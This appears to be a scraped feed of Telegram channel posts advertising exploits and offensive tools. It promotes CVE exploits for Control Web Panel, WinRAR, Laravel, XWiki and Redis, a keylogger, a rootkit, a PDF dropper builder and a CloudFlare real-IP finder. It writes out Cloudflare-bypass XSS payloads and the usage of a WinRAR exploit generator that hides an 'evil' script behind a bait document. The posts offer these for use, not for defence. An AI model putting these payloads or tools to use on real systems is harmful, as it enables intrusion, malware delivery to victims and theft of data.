Control Web Panel Unauthenticated Remote Command Execution Exploit

➖ Category: remote exploits

🖥 Platform: linux

🪖 Risk: Security Risk Critical 🚨

🗂️ Size: 🅰🅰🅰📝📝

📝
Description: Control Web Panel versions prior to 0.9.8.1147 are vulnerable to unauthenticated OS command injection. Successful exploitation results in code execution as the root user. The results of the command are not contained within the HTTP response and the request will block while the command is running.

⭐ CVE: CVE-2022-44877

#CVE #Linux #Exploit
➗➗➗➗➗➗➗➗➗➗➗➗
👤 T.me/MRvirusIRBOT
📢 T.me/SashClient
🪩 Https://discord.gg/UfFvDYBBMM
🌐 Https://sash.mybin.ir

Exploits bank of NMAP program

🔗 Link

#Nmap #Vuln #Exploit
➗➗➗➗➗➗➗➗➗➗➗➗
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3

Post exploitation tools:

➕ Vegile — Ghost In The Shell:
😸 GitHub

➕ Chrome Keylogger:
😸 GitHub

➕ Forensic tools

➕ Autopsy:
😸 GitHub

➕ Wireshark:
🌐 Site

➕ Bulk extractor:
😸 GitHub

➕ Disk Clone and ISO Image Aquire:
🌐 Site

➕ Toolsley:
🌐 SIte

#RootKit #Keylogger #Exploit #Tools
➗➗➗➗➗➗➗➗➗➗➗➗
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3

Marijuana Exploit 🍀

⬇️ Download

🔒 @LearnExploit

#Exploit #Bot
➗➗➗➗➗➗➗➗➗➗➗➗
🔥 0Day.Today
👤 T.me/BugCod3
📢 T.me/LearnExploit

🪳CVE-2023-38831 winrar exploit generator 🪳

👥 Quick poc test:
Generate the default poc for test

python cve-2023-38831-exp-gen.py poc

or

python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat  poc.rar

👤 Custom:
⚪️ Place the bait file and (evil) script file in the current directory, the bait file is recommended to be an image (.png, jpg) or a document (.pdf)
⚪️ Run

python cve-2023-38831-exp-gen.py <bait name> <script name> <output name>

to generate your exploit

👆 Analysis Blog
👁‍🗨 Reference
😸 Github

⬇️ Download
🔒 BugCod3

#CVE #Winrar #Exploit
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

💜 CloudPeler 💜

📊 CrimeFlare is back again! This tools can help you to see the real IP behind CloudFlare protected websites

👁‍🗨 Introduction:
This tool serves to find the original IP behind websites that have been protected by CloudFlare, the information generated can be useful for further penetration. The information generated by this tool is as follows.

⚪️ CloudFlare IP
⚪️ CloudFlare NS1
⚪️ CloudFlare NS2
⚪️ Real IP
⚪️ Hostname
⚪️ Organization
⚪️ Address (Country, City, Region, Postal Code)
⚪️ Location
⚪️ Time Zone

💻 Code Samples:
This tool is made with PHP code with very simple programming using several APIs to get maximum results, but this tool does not guarantee 100% to be able to bypass websites that have been protected by CloudFlare. Some websites sometimes cannot be detected by their original IP.

📱 Installation:

sudo apt install php-curl
cd CloudPeler
./crimeflare.php exemple.com

😸 Github

⬇️ Download
🔒 BugCod3

#Cloudflare #Bypass #Exploit
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

⚡️ Cloud7 Bot Exploit ⚡️

Run Script with Python 2.7

📊 Recommended:

python -m pip install requests
python -m pip install bs4
python -m pip install colorama
python -m pip install lxml

⬇️ Download
🔒 @LearnExploit

#Exploit #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Cloudflare bypass XSS payloads

Tested On: 👩‍💻

XSS Payloads:

for(t?c.outerHTmL=o:i=o=’’;i++<1024;o+=`<code onclick=this.innerHTmL=’${M(i)?’*’:n||’·’}’>#</code>${i%64?’’:’<p>’}`)for(n=j=0;j<9;n+=M(i-65+j%3+(j++/3|0)*64))M=i=>i>64&i<960&i%64>1&C(i*i)>.7
javascript:{alert ‘0’ }
≋ "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># ≋
<svg/OnLoad="`${prompt``}`">

#Exploit #XSS #Payload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🐱 SiCat 🐱

The useful exploit finder

💬
SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.

SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.

🔼 Installation:

pip  install  -r  requirements.txt

💻 Usage:

python sicat.py --help

📂 Example:
From keyword:

python sicat -k telerik --exploitdb --msfmodule

From nmap output:

nmap -sV localhost -oX nmap_out | python sicat -nm --packetstorm

😸 Github

⬇️ Download
🔒 BugCod3

#Exploit #Metasploit #Finder
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🔥 PDF-BUILDER (POC) - (Non Silent) 🔥

💬
POC Pdf-exploit builder on C#
Exploitable versions: Foxit Reader, Adobe Acrobat V9(maybe).

💻 Usage:
Put your exe-link and build the PDF-FILE

😸 Github

⬇️ Download
🔒 BugCod3

#C #PDF #Exploit
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

CNEXT exploits

💬
Exploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv()

👁‍🗨 Technical analysis:
The vulnerability and exploits are described in the following blogposts:

⚪️ Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine (part 1)
⚪️ To be continued...

🗝 Exploits:
Exploits will become available as blogposts come out.

⚪️ CNEXT: file read to RCE exploit
⚪️ To be continued...

😸 Github

⬇️ Download
🔒 BugCod3

#CVE #Exploit #Cnext
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path

Exploit Author: Ex3ptionaL

Exploit Date: 2024-04-01

Vendor: https://www.eset.com

Version: 17.0.16.0

Tested on OS: Microsoft Windows 10 pro x64

🕷 Exploit-db

⬇️ Download

#Exploit #ESET #NOD32
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LernExploit
📣 T.me/A3l3_KA4

WordPress A/B Image Optimizer 3.3 Plugin Arbitrary File Download Vulnerability

📊 Category: web applications

💻 Platform: php

🪖 Risk: Security Risk High 🚨

💬
WordPress Plugin A/B Image Optimizer plugin versions 3.3 and below suffers from an arbitrary file download vulnerability.

🔥 CVE: CVE-2025-25163

⬇️ Download
🔒 BugCod3

#CVE #Exploit #PHP #WordPress
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Laravel RCE Exploitation Toolkit 🤕

Purpose: Exploits Laravel RCE vulnerability by using a known APP_KEY to generate a malicious payload that leads to remote code execution. If successful, it writes a backdoor to the server and logs the URL ⭐

💻 Github

#Exploit #laravel #Rce #Rcr_Exploit

Join Exploit Forge ✈️
Join Exploit Forge Forum ✈️
Join BugCod3✈️

CVE-2025-24893 🤔

is a critical unauthenticated remote code execution (RCE) vulnerability affecting the XWiki Platform 🩷

Summary ❗

Affected Versions ❓

XWiki 🤔 5.3-milestone-2 up to < 15.10.11 🦠

XWiki 🤔 16.0.0-rc-1 up to < 16.4.1 🦠

CVSS v3.1 Score : 9.8 (Critical) 🔫

Github 🌐

#Rce #Exploit

Join Exploit Forge 💎
Join Exploit Forge Forum 💎
Join BugCod3 💎

Researchers discovered a critical Redis vulnerability called RediShell 🗡

(CVE-2025-49844) a CVSS 10 remote code execution flaw affecting all Redis versions. It allows attackers to send a malicious Lua script, escape the sandbox, and execute code on the host. Around 330,000 Redis instances are exposed online, 60,000 of them without authentication, and over 75% of cloud environments use Redis⚡️

CVE-2025-49844 (RediShell) POC 🛡

Github

#cve #poc #exploit #redishell #redis

Join Exploit Forge 🔝
Join Exploit Forge Forum 👑
Join BugCod3 🤝